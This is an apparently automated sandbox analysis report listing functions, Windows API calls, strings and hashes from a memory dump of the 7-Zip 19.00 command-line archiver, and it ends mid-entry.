                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: a894c9f81bc7411e424a6da5d140685d4e31b34b16989fe922eef7c3468bf76d
                                                                                                                                                                                                • Instruction ID: 8964a4ea8b1154203d31744629e575b59bf80df564f9472c6ecb43b0094e74b0
                                                                                                                                                                                                • Opcode Fuzzy Hash: a894c9f81bc7411e424a6da5d140685d4e31b34b16989fe922eef7c3468bf76d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 17E17633319B8092DB54DF26E4A476EB7A4F789B84F549422EB8E93725DF38C895C700
                                                                                                                                                                                                Function 00946F50 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116threadCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00946F6D
                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00946F78
                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00946F85
                                                                                                                                                                                                  • Part of subcall function 0094339C: free.MSVCRT ref: 009433D7
                                                                                                                                                                                                  • Part of subcall function 0094339C: memmove.MSVCRT(00000000,?,?,00000000,009410A8), ref: 009433F2
                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00947023
                                                                                                                                                                                                • SetLastError.KERNEL32 ref: 0094705C
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00947086
                                                                                                                                                                                                  • Part of subcall function 00946C84: CreateDirectoryW.KERNEL32 ref: 00946CA8
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CountCurrentErrorLastTick$CreateDirectoryProcessThreadfreememmove
                                                                                                                                                                                                • String ID: .tmp$d
                                                                                                                                                                                                • API String ID: 3444860307-2797371523
                                                                                                                                                                                                • Opcode ID: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
                                                                                                                                                                                                • Instruction ID: d683658f1fc6327d2f6f5b079d33933a1c793eb6e6449967160d990f548add88
                                                                                                                                                                                                • Opcode Fuzzy Hash: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
                                                                                                                                                                                                • Instruction Fuzzy Hash: FE318466318250D7DB30DB66E890B2DE361BB96BC0F409122EF8247B21DF38C486C702
                                                                                                                                                                                                Function 00946B2C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 87libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$AddressHandleModuleProc
                                                                                                                                                                                                • String ID: CreateHardLinkW$kernel32.dll
                                                                                                                                                                                                • API String ID: 399046674-294928789
                                                                                                                                                                                                • Opcode ID: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
                                                                                                                                                                                                • Instruction ID: 4ad801040739d07d2fa872b71d6053ec9fbf0babe5a1fe840cdda63100d23ef9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C2138A325958041CE20EB25EC51F6B6314EBC77D0F842231FEAA87765DE28CC86C701
                                                                                                                                                                                                Function 0094DEBC Relevance: 13.9, APIs: 11, Instructions: 168COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 7aae74738ebb1fa26e9c45f1fe68a2e26c39cce5353d9637d771cf3076791eab
                                                                                                                                                                                                • Instruction ID: bd4e1385cdaa3c5b539f4aaf67deebd7e32f0991aa6d7be9961c92d1f80e7e63
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7aae74738ebb1fa26e9c45f1fe68a2e26c39cce5353d9637d771cf3076791eab
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E51D527229A4095CB35EF25E850A6B7760FBC9BE4B980225FF6E47764EF38C546C700
                                                                                                                                                                                                Function 00952C58 Relevance: 13.6, APIs: 9, Instructions: 127COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
                                                                                                                                                                                                • Instruction ID: 681921caaaf863ee43038eec13e70102ae856d6a0e37ef89495ee7d99209cfb0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
                                                                                                                                                                                                • Instruction Fuzzy Hash: CD41832371458086CB34EF16D88062D6375F78A7A5F994236FF5E17B94DA38C88A8740
                                                                                                                                                                                                Function 00975988 Relevance: 12.7, APIs: 10, Instructions: 233COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: e1faaf7df75186d5ae884903546cdcce3f308a231f1a81c91827175cf65db9ce
                                                                                                                                                                                                • Instruction ID: 4a5ac524a26f8706169ba7a6419624226869705a635ea592322bb9bf1fe4c44b
                                                                                                                                                                                                • Opcode Fuzzy Hash: e1faaf7df75186d5ae884903546cdcce3f308a231f1a81c91827175cf65db9ce
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C91D233205B8082CB64DF25E490B6EB364F7C4B94F959616EB8E47768DFB8C885CB40
                                                                                                                                                                                                Function 009713E8 Relevance: 12.6, APIs: 10, Instructions: 133COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 7386053c805783c8b149fe4df64e3429d83df24b0f84080fe73c7ae0aa69eb51
                                                                                                                                                                                                • Instruction ID: d4c8424b1740f67d663004f62851b606ea136ece26d2c9af8a1ac8eb1add4ef3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7386053c805783c8b149fe4df64e3429d83df24b0f84080fe73c7ae0aa69eb51
                                                                                                                                                                                                • Instruction Fuzzy Hash: 93513B67209AC486C624DF2AE49079E7765F7CAB84F409012DF8E67B25CF39C496CB04
                                                                                                                                                                                                Function 009716B2 Relevance: 12.6, APIs: 10, Instructions: 125COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                                                                                                                                                                                • Instruction ID: 3a94c5230544cb04ee0e66d5cb1f38637da957ee5fdfc6184703ffaff0561db9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6041E5B7205B8482CA28DF2AE8903AE63A5FBC9F95F449422DB4E57725DF38C495C300
                                                                                                                                                                                                Function 00986A20 Relevance: 12.6, APIs: 10, Instructions: 59COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                                                                                                                                                                                • Instruction ID: a26227087ed6ef7f9f523a44bb9efd02615f7edbef0f2e2eebca6b3cf2f6160e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                                                                                                                                                                                • Instruction Fuzzy Hash: FC1149236058C488CB19BF26DC517A82265EBCAF94F5D8172BF2E1F359DE20C8828350
                                                                                                                                                                                                Function 0094FC9C Relevance: 12.5, APIs: 10, Instructions: 44COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                • Opcode ID: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                                                                                                                                                                                • Instruction ID: c2145d8488ce2527cf5ca55ac3ee34949b6ee3cdc730715e5d8b456682ab2c26
                                                                                                                                                                                                • Opcode Fuzzy Hash: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2001002331598596CA08EF26DD51A6C7360FFC9F947444162BF2D4B765DF20D8A6C344
                                                                                                                                                                                                Function 00976528 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 132COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID: /$\$a$z
                                                                                                                                                                                                • API String ID: 1294909896-3795456795
                                                                                                                                                                                                • Opcode ID: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                                                                                                                                                                                • Instruction ID: 8deebadbb1759c2fe1205f7a50facdb07b3e97111e32fd2fc4202816347ea5a4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9241E453A00E4999DB30EF21D0047B93768F351B98FD9C226EA9D03394EB7989C6E745
                                                                                                                                                                                                Function 0098870C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 0098877E
                                                                                                                                                                                                • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 0098878E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$fputs
                                                                                                                                                                                                • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                                                                                                                                                                                • API String ID: 2444650769-4238946813
                                                                                                                                                                                                • Opcode ID: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                                                                                                                                                                                • Instruction ID: 8a222d6cbd970001c2c084a2bc68858ac1b3599ae72a463b7756ba1ebfcba749
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D21A2633056C195DA30EB25FA803AAB361F785B84FD84826CA4E97B19DF3CC885CB50
                                                                                                                                                                                                Function 0098E3E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                                                                                                                                                                                                • API String ID: 1646373207-4044117955
                                                                                                                                                                                                • Opcode ID: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
                                                                                                                                                                                                • Instruction ID: 7a1ae2a1508b672bc38ef77a3f1864865bd7217e932a16de7a7bf2c845eeb2e6
                                                                                                                                                                                                • Opcode Fuzzy Hash: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
                                                                                                                                                                                                • Instruction Fuzzy Hash: E6E092A8651B06D1EE04DB51FCB835423A0F74B761F90A035C42E07322EF3CC19AC740
                                                                                                                                                                                                Function 00944F24 Relevance: 11.4, APIs: 9, Instructions: 111COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                • Opcode ID: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
                                                                                                                                                                                                • Instruction ID: cc7372ceba7623d7493950a1945236a2173e374da8bda413ee82725902d111fa
                                                                                                                                                                                                • Opcode Fuzzy Hash: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3731D866718EC043DA20DF66D890B6D6710BFD6FE4B484221FFAE1B79ADF29C4468740
                                                                                                                                                                                                Function 00960554 Relevance: 11.4, APIs: 9, Instructions: 100COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 408039514-0
                                                                                                                                                                                                • Opcode ID: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
                                                                                                                                                                                                • Instruction ID: b4d660267a24c5365ca1093d676d5bd957aa5be835f7b09e059d30d0d7bb1d1b
                                                                                                                                                                                                • Opcode Fuzzy Hash: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
                                                                                                                                                                                                • Instruction Fuzzy Hash: FE3192232285809BCB30DF25E89065EB760F7C9794F841225EB9E87B69DF39D895CB00
                                                                                                                                                                                                Function 0097EAD4 Relevance: 11.3, APIs: 9, Instructions: 94COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1475443563-0
                                                                                                                                                                                                • Opcode ID: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
                                                                                                                                                                                                • Instruction ID: 6a103abbf1e6eefd16fc1f48865a067e4ba6115f28da12ac4ab6a55a4915689e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C316FA230D70091EB44EF6B99653A827259789FD4FC49495EE0AD7706EF78CE45C304
                                                                                                                                                                                                Function 009729F7 Relevance: 11.3, APIs: 9, Instructions: 52COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
                                                                                                                                                                                                • Instruction ID: b52fda74523887a5cc50b9a3a1630ee3f3fc1d22734d569453cd3ef1b87eb6dd
